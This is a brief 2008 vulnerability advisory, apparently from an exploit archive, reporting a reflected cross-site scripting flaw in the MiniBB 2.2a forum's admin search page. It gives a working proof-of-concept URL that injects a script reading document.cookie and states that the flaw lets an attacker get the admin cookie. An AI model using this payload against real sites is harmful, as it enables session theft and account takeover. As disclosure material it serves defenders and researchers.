Minibb 2.2a XSS Vulnerability

2008-05-15
ID: 70964
CVE: None
Download vulnerable application: None
########################################################################
#############

####                               Minibb 2.2a                                   ####

####                            XSS Vulnerability                                ####

########################################################################
#############

#                                                                                   #

#AUTHOR : IRCRASH (Dr.Crash Or Khashayar Fereidani)                                 #

#Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani)                          #

#IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr

########################################################################
#############

#                                                                                   #

#Script Download : http://www.minibb.net/                                           #

#                                                                                   #

########################################################################
#############

#                                   < XSS >                                         #

#XSS Address : http://example/bb_admin.php?action=searchusers2&whatus=" /> <script>alert(document.cookie)</script>&searchus=id

#                                                                                   #

# You Can Get Admin Cookie With This Vuln ....                                      #

#                                                                                   #

########################################################################
#############

#                           Site : http://IRCRASH.COM                               #

#####################################TNX GOD#########################################
1-4-2 (www02)